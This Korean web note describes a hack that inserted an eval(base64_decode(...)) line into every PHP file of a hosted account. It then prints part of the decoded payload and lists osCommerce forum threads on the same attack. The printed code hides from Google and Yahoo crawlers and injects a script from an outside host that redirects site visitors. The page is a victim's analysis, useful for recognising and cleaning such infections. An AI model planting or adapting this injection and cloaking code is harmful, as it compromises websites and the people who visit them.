sitelink1 | http://www.mcpanic.com/2010/05/07/php-ev...4%ED%82%B9 |
---|---|
sitelink2 | |
extra_vars5 | |
extra_vars6 |
1. 동일한 피해를 입은 사용자의 사례 (출처 :: sitelink1)
호스팅 해서 쓰고 있는 계정의 모든 PHP 파일의 첫줄에
<?php /**/ eval(base64_decode(“….”); ?>
이 삽입되는 해킹을 당했다. 유사한 사례를 찾아보니 인터넷에 좀 있기는 하다.
PHP 스크립트를 사용하는 동작을 하면 갑자기 이상한 URL 로 자동 리다이렉트 되는 문제가 생긴다.
첫줄에 있는 base64_decode 안에 있는 코드가 실행이 되면서 엉뚱한 곳의 코드를 실행하는 것이다.
decode 를 해보니 볼드체로 된 URL 에 있는 스크립트를 실행한다.
if(function_exists(‘ob_start’)&&!isset($GLOBALS[‘mr_no’])){
$GLOBALS[‘mr_no’]=1;
if(!function_exists(‘mrobh’)){
if(!function_exists(‘gml’)){
function gml(){
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
return “<script src=’http://zettapetta.com/js.php’></script”;
}
return "";
}
}
<후략>
2. 참고 URL 모음
https://forums.oscommerce.com/topic/345957-evalbase64_decode-hack/
https://forums.oscommerce.com/topic/340995-security-issue-with-admin-directory/
https://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
https://forums.oscommerce.com/topic/344272-did-someone-hack-my-site-eval-base64-decode/